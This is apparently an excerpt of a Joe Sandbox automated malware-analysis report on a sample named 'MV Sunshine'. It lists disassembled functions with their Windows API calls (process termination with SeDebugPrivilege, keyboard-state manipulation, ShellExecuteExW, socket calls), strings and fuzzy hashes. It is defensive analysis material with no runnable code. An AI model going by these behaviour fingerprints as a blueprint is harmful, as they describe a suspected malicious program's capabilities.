SendMessageW.USER32(?,00001057,00000000,?), ref: 006A7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 006A7161

Strings

SysListView32, xrefs: 006A7065

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 89ae059016c17098f388cd0d431c9f015ea758945707b28f54a6593b40c334ff
Instruction ID: 02e3b2c52613bcdaf32cfc8d5e7e4a96c8f5d227da3f62ffad4fa83595808241
Opcode Fuzzy Hash: 89ae059016c17098f388cd0d431c9f015ea758945707b28f54a6593b40c334ff
Instruction Fuzzy Hash: 6941A371A04308AFDB21AFA4CC85BEE77EAEF09350F10046AF545E7292D7719D848F64

Function 0069EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00683E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00683EB6
Part of subcall function 00683E91: Process32FirstW.KERNEL32(00000000,?), ref: 00683EC4
Part of subcall function 00683E91: CloseHandle.KERNEL32(00000000), ref: 00683F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0069ECB8
GetLastError.KERNEL32 ref: 0069ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0069ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0069ED77
GetLastError.KERNEL32(00000000), ref: 0069ED82
CloseHandle.KERNEL32(00000000), ref: 0069EDB7

Strings

SeDebugPrivilege, xrefs: 0069ECD6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 6b81ad77954a657e24e9e2a55965c250d29b12636ee3c7db9121ff5c70363c08
Instruction ID: a49b60d5067380c1f3473542ba0da328523c8fc9a9ed4bc4a403aa645e7c193d
Opcode Fuzzy Hash: 6b81ad77954a657e24e9e2a55965c250d29b12636ee3c7db9121ff5c70363c08
Instruction Fuzzy Hash: 3241AC706002109FDB14EF24C895F6DB7A6AF81714F08841DF8469B7C2DB76A808CF9A

Function 00683226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006832C5

Strings

stop, xrefs: 00683296
question, xrefs: 0068327E
info, xrefs: 00683266
warning, xrefs: 006832AE
blank, xrefs: 00683247

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 1680286a682e0179ee8149f6db1f4ce927c1dabce04c3016ee3504b7b30018fa
Instruction ID: afac9c1fb49a93d1ee90b0d123718ee51a9bf364f8b9bcef28555908b61332a6
Opcode Fuzzy Hash: 1680286a682e0179ee8149f6db1f4ce927c1dabce04c3016ee3504b7b30018fa
Instruction Fuzzy Hash: 5D112B3160C3667AA7017B95DC62CAAB39EDF19B70F10016AF500A63C2E6659B4147A5

Function 00684534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0068454E
LoadStringW.USER32(00000000), ref: 00684555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0068456B
LoadStringW.USER32(00000000), ref: 00684572
_wprintf.LIBCMT ref: 00684598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006845B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00684593

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: c54428bf0827912c42d80da9fd5feb2323a59749f0cb6c96d94469e78f0a906b
Instruction ID: b128e091240459d60f7ad0f87406def8cf42b8cc819a56914aa2e7ea6b8b3f67
Opcode Fuzzy Hash: c54428bf0827912c42d80da9fd5feb2323a59749f0cb6c96d94469e78f0a906b
Instruction Fuzzy Hash: CB0144F2900208BFE750B7D09D89EEB776DDB09301F0015A5B745D2151EA746E854F76

Function 006AD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

GetSystemMetrics.USER32(0000000F), ref: 006AD78A
GetSystemMetrics.USER32(0000000F), ref: 006AD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006AD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006ADA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006ADA24
ShowWindow.USER32(00000003,00000000), ref: 006ADA43
InvalidateRect.USER32(?,00000000,00000001), ref: 006ADA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 006ADA8B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 6aed15676538e0c9ad1bbc23b683f782e9444e7e0bc6bd3671572f1def2c3a43
Instruction ID: 2d65a19d7646fcf831b2145dbf2220794515e8825d7d28fd818331544a047f58
Opcode Fuzzy Hash: 6aed15676538e0c9ad1bbc23b683f782e9444e7e0bc6bd3671572f1def2c3a43
Instruction Fuzzy Hash: 1FB17A71600215EBDF14DF68C9857EE7BB2BF06701F088069ED4A9A695DB34AD50CFA0

Function 00622A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0065C417,00000004,00000000,00000000,00000000), ref: 00622ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0065C417,00000004,00000000,00000000,00000000,000000FF), ref: 00622B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0065C417,00000004,00000000,00000000,00000000), ref: 0065C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0065C417,00000004,00000000,00000000,00000000), ref: 0065C4D6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: db2b311f9a385a60e5e534c16dd57ad7f2358cfec8660cd81b6d2adcab487d3e
Instruction ID: 3bca231b8f1c8351753d530b2e362db76deb08f1e7bd7a49be25bb7e686ef8ac
Opcode Fuzzy Hash: db2b311f9a385a60e5e534c16dd57ad7f2358cfec8660cd81b6d2adcab487d3e
Instruction Fuzzy Hash: C7410830204B91BEC7359B28ECB8BBB7BD3AB46315F18842DE44746A61C675A886DF11

Function 00687368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0068737F

Part of subcall function 00640FF6: std::exception::exception.LIBCMT ref: 0064102C
Part of subcall function 00640FF6: __CxxThrowException@8.LIBCMT ref: 00641041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006873B6
EnterCriticalSection.KERNEL32(?), ref: 006873D2
_memmove.LIBCMT ref: 00687420
_memmove.LIBCMT ref: 0068743D
LeaveCriticalSection.KERNEL32(?), ref: 0068744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00687461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00687480

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: ed781276e02370c94950d799e0d1d825c3274a12533c0354bffd10793b31c3a0
Instruction ID: 706533e8c2eba4b9602c0509e715a429955a844d7c7478d724c004ae960b7b3a
Opcode Fuzzy Hash: ed781276e02370c94950d799e0d1d825c3274a12533c0354bffd10793b31c3a0
Instruction Fuzzy Hash: 4831C131900205EBDF50EFA4DC85AAE7BBAEF45700B1441B9FD049B246DB30DE54CBA5

Function 006A6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006A645A
GetDC.USER32(00000000), ref: 006A6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006A646D
ReleaseDC.USER32(00000000,00000000), ref: 006A6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006A64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006A64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006A9299,?,?,000000FF,00000000,?,000000FF,?), ref: 006A6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006A6520

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 30ea4303404f82c335be4d1ae3659dbcee6bd8aebd802efc7d9cc023fa08d7b5
Instruction ID: a34fdfaa0f3b735fe4195ad0f02a2ce801f6232f6ecd989b00610d2aa196633a
Opcode Fuzzy Hash: 30ea4303404f82c335be4d1ae3659dbcee6bd8aebd802efc7d9cc023fa08d7b5
Instruction Fuzzy Hash: BA319F72200210BFEB109F50CC4AFEB3FAAEF0A765F085065FE089A291C675AC41CB75

Function 0067C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0067C087
_memcmp.LIBCMT ref: 0067C0A9
_memcmp.LIBCMT ref: 0067C0C1
_memcmp.LIBCMT ref: 0067C0D4
_memcmp.LIBCMT ref: 0067C0EE
_memcmp.LIBCMT ref: 0067C101
_memcmp.LIBCMT ref: 0067C119
_memcmp.LIBCMT ref: 0067C134

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 759f86f7b186b152ec9303b3726f755bfdf45929267d9d6414aef18e036cd2bf
Instruction ID: 81e805c44590ab9fc7a3528fdf6eb11ef9b52787998cde88d7eecff66e0e5e23
Opcode Fuzzy Hash: 759f86f7b186b152ec9303b3726f755bfdf45929267d9d6414aef18e036cd2bf
Instruction Fuzzy Hash: 8321C5A1600206B7D750A6209C52FFB279FAF113B4B45802CFD0D9A383F752DD5182E9

Function 0068ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

Part of subcall function 0063FEC6: _wcscpy.LIBCMT ref: 0063FEE9

_wcstok.LIBCMT ref: 0068EEFF
_wcscpy.LIBCMT ref: 0068EF8E
_memset.LIBCMT ref: 0068EFC1

Strings

X, xrefs: 0068EFFE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: ec931ca64c55387b6154560a68466fec8ed51dd1ba57f3060774d5b46902e63e
Instruction ID: 7d921fa63fe8ce4a81eaaa7c1b518c5ec1153500dbe7a228be9eb57bc7023725
Opcode Fuzzy Hash: ec931ca64c55387b6154560a68466fec8ed51dd1ba57f3060774d5b46902e63e
Instruction Fuzzy Hash: 01C19F316087119FC764EF24D885A9AB7E2BF84310F00496DF8999B3A2DB30EC45CF96

Function 00696E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00696F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00696F35
WSAGetLastError.WSOCK32(00000000), ref: 00696F48
htons.WSOCK32(?,?,?,00000000,?), ref: 00696FFE
inet_ntoa.WSOCK32(?), ref: 00696FBB

Part of subcall function 0067AE14: _strlen.LIBCMT ref: 0067AE1E
Part of subcall function 0067AE14: _memmove.LIBCMT ref: 0067AE40

_strlen.LIBCMT ref: 00697058
_memmove.LIBCMT ref: 006970C1

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 1285bcc1e065601d5086c84c165088a56a19962a253b150782694e5a7c9418e2
Instruction ID: f7e08e671270452a573456e3f2e436e8d1fe4b2f950d6f2f99aef697e8c02214
Opcode Fuzzy Hash: 1285bcc1e065601d5086c84c165088a56a19962a253b150782694e5a7c9418e2
Instruction Fuzzy Hash: C481E171508710AFDB50EF24DC82E6BB3EFAF84714F10891DF5559B292DA70AD01CBA6

Function 00621424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6522929d4e736f389d12bbb6d793fd1e45759a9ea296ead09cbc5e4408236ef3
Instruction ID: 5305887deaa3a9cb8b9509d5ad074c3055eee0cd9ec9ea14881c2c94386bc8ab
Opcode Fuzzy Hash: 6522929d4e736f389d12bbb6d793fd1e45759a9ea296ead09cbc5e4408236ef3
Instruction Fuzzy Hash: ED71AD30904519EFCB04DF98DC49AFEBBBAFF86310F108159F915AA251C734AA52CFA5

Function 006AB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00BD4B10), ref: 006AB6A5
IsWindowEnabled.USER32(00BD4B10), ref: 006AB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006AB795
SendMessageW.USER32(00BD4B10,000000B0,?,?), ref: 006AB7CC
IsDlgButtonChecked.USER32(?,?), ref: 006AB809
GetWindowLongW.USER32(00BD4B10,000000EC), ref: 006AB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006AB843

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e84a163ea0de084822a8c150a5c6ad7bf9ff39b9e99c0dcd6463f235e6faf154
Instruction ID: 6833a94f1dd6905702c8cee84e3c8772c467e796e0002b646a1eafccb0c7a675
Opcode Fuzzy Hash: e84a163ea0de084822a8c150a5c6ad7bf9ff39b9e99c0dcd6463f235e6faf154
Instruction Fuzzy Hash: 2D718A34600204AFDB24AFA4C8A4FEA7BABFB5B340F146069F945973A2C771AD51CF50

Function 0069F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069F75C
_memset.LIBCMT ref: 0069F825
ShellExecuteExW.SHELL32(?), ref: 0069F86A

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

Part of subcall function 0063FEC6: _wcscpy.LIBCMT ref: 0063FEE9

GetProcessId.KERNEL32(00000000), ref: 0069F8E1
CloseHandle.KERNEL32(00000000), ref: 0069F910

Strings

@, xrefs: 0069F839

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: e7fe5b35ba2a4592f59e02e2a97f2815eaaf2fb2a4efd248d8f2131bfdc3eaf8
Instruction ID: 89ac10ad6c94b03fd164544779698eeb5407c530cf8f789e3eb09561c10de9ca
Opcode Fuzzy Hash: e7fe5b35ba2a4592f59e02e2a97f2815eaaf2fb2a4efd248d8f2131bfdc3eaf8
Instruction Fuzzy Hash: 7E619974A006299FCF04EF94D5819AEBBB6FF48310F15846DE846AB751CB30AD40CF94

Function 0068145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0068149C
GetKeyboardState.USER32(?), ref: 006814B1
SetKeyboardState.USER32(?), ref: 00681512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00681540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0068155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 006815A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006815C8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cd032e79f00a207564341547131409bdbe979224b271a7e0eba7d305efee16ce
Instruction ID: 88b7cdc531b63f99c2e67246befa9dd3913141859bd73959e0b16a219f26ad53
Opcode Fuzzy Hash: cd032e79f00a207564341547131409bdbe979224b271a7e0eba7d305efee16ce
Instruction Fuzzy Hash: A651F0A0A042D53EFB3263648C45BFA7EAF5B47304F08868DE1D59A9C2D294ACC6D761

Function 00681276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 006812B5
GetKeyboardState.USER32(?), ref: 006812CA
SetKeyboardState.USER32(?), ref: 0068132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00681357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00681374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006813B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006813D9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7444df41fcb8fadcbd0756b928533e0dc6748e998c934902f1481f01fc4ae5b6
Instruction ID: 8393fa6b28ecf57f4b870ed3f581259d272455d97f401cbcd40608aa9a0b606e
Opcode Fuzzy Hash: 7444df41fcb8fadcbd0756b928533e0dc6748e998c934902f1481f01fc4ae5b6
Instruction Fuzzy Hash: 8C51F3A09046D53EFB32A7248C55BBABFAF5B07300F08868DE1D49E9C2D395AC86D751

Function 0068589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 006858AC
_wcsncpy.LIBCMT ref: 006858E1
_wcsncpy.LIBCMT ref: 00685913
_wcsncpy.LIBCMT ref: 00685946
_wcsncpy.LIBCMT ref: 00685988
_wcsncpy.LIBCMT ref: 006859C2
_wcsncpy.LIBCMT ref: 006859F1

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
